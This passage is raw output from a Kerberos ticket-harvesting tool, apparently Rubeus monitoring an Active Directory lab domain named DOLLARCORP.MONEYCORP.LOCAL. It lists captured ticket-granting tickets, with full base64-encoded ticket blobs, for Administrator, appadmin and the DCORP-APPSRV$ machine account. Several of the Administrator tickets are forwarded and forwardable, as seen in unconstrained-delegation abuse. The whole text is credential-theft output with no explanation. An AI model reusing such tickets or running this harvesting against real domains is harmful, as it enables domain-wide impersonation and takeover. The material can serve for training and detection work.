2w4LIBhR6dGSK1OSgBG19MYK8Qvi0UfAF7TMPWrDnsYeC8AIvLGqS/lbuOvpZhnjQVbKoY2kcUd348vSKFI7aQwJyYc2bySSBPDTkKOcQfyLixichovK6kPOylz13dE7W2+t46Uz4lwLBkOn8g4raoenLCEXOh6i/JuO4bYJPyAkKtzrHYwTnfsopIuZMNi9FRLQO0dkfwHxcL51PUK2dY7UeYGkPLDCl/D5cgUPzDiYQQAG0rpQiUYWb+oDynXnoYYI1xaEgj/zAu+d4tafwbVsFTRQtW6zzampziYsWIaKSQH+WgUPsJQ2G2vHEueGvZXlHZvFD7zEcrHooJMxDj/RTAhAKATcM2lFS4p7B1qXArkdvgzYgPr8jZ/+yiYgWwyKSms1FOqgHPGOmcjXjXyHCmWlSK36v5uTZtdUc/aFNsH4VN8UU7RTK0WZ/DkmdWBgXcIayPhE4+/LYxmt6gXagxX256xmquakrrjlrAZbEA/XPl5iVvUYA8pwxTHAtkJqHYsd5h6XaoCkBhJiBGVNxdDBw9bscrympS58b6EpKxJPJ4AneLg4LdQoQiE3uqswu4pt6wywFasXO6zqI6Ni5WJeiFZRYCaajuhbDBBfSPIbff86nXJESInFHzAyHcIWtNMeiI5mvnDZEQbFYPp9GdQuVOBzVTZkBvRQA/ko+UBkssUuUPn/Dl6ULj6SFtwKpQaGDqd4i/MspR9odt/xd8j3N9jXBefM3D7JzTAaR0YA/47u1P4Ouf9IT9DV+YBquKLHkakDTFFH7ZfwamUtmFAfvgeNtvybLsR5KVXWK9uXJL3XyveeDaRXKAxAHgKdkqMfNv5pf72tftjp2axPsBXXNx1YMWJ5qfXAtxxUjHsTOEhk0ASKvEQRJWdUKhcJL7vKIEwdqngMnABFYMjNppqWF+IxfB8/+ygy98pG4wWHrD37/6oxXwlZn6cVN9vuDaKXokWw4cF/Rr5+2sKpRS/S3GvW+ytwBcuLyxHv0M7XYER2A5Kk8k173KCfNPLFjDX8uu0oxo4IBGjCCARagAwIBAKKCAQ0EggEJfYIBBTCCAQGggf4wgfswgfigKzApoAMCARKhIgQgW1Swjb22zJ/ehWttUqFMyKWHI3oQJHDRoyd7V2/VCJGhHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQBgoQAApREYDzIwMjQwMzAyMjM1NzEyWqYRGA8yMDI0MDMwMzA5NTcxMlqnERgPMjAyNDAzMDkyMzU3MTJaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTA==
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:56:12 PM
EndTime : 3/3/2024 1:56:12 AM
RenewTill : 3/9/2024 3:56:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:55:12 PM
EndTime : 3/3/2024 1:55:12 AM
RenewTill : 3/9/2024 3:55:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:53:12 PM
EndTime : 3/3/2024 1:53:12 AM
RenewTill : 3/9/2024 3:53:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:49:12 PM
EndTime : 3/3/2024 1:49:12 AM
RenewTill : 3/9/2024 3:49:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : appadmin@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 6:47:37 AM
EndTime : 3/2/2024 4:47:37 PM
RenewTill : 3/9/2024 6:47:37 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
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
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : DCORP-APPSRV$@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:20:48 PM
EndTime : 3/3/2024 1:20:48 AM
RenewTill : 3/9/2024 5:35:48 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
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
[*] Ticket cache size: 16
[*] 3/2/2024 11:58:12 PM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:58:12 PM
EndTime : 3/3/2024 1:58:12 AM
RenewTill : 3/9/2024 3:58:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
